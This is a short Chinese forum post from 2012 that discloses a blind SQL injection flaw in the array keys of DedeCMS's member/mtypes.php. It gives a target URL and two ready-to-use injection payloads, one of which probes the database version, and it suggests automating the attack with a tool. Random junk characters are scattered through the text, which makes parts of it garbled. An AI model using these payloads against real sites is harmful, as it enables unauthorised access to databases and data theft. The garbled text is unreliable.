需要magic_quotes_gpc = Off,所以说是鸡肋啊.8 d/ m5 v' e- d1 t" l& t3 z
. d: u- c' ?; x) o
- c; \% G1 W8 S) ~& a
发生在数组key里的注射漏洞,有点意思.* O" m) S3 m, a* C* }( ^
5 f" r$ |2 T* i+ n5 h9 t这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下) z1 h. ^. t' \4 T! r. z
- X7 q+ e% k2 t) ?0 Ohttp://www.xxx.com /dede/member/mtypes.php?dopost=save
9 \4 L) X5 d1 M% ?, F4 V5 p
_8 C1 w4 [) S$ |7 r t3 Iexploit:
* u: o( a+ U8 g' B0 \* w& kmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
2 Q$ X: L/ [) d1 x- [! }mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r' m5 A' F% K, [: ?; k8 `5 I$ d( f
|
发表于 2012-12-20 08:08:09
收藏
支持
反对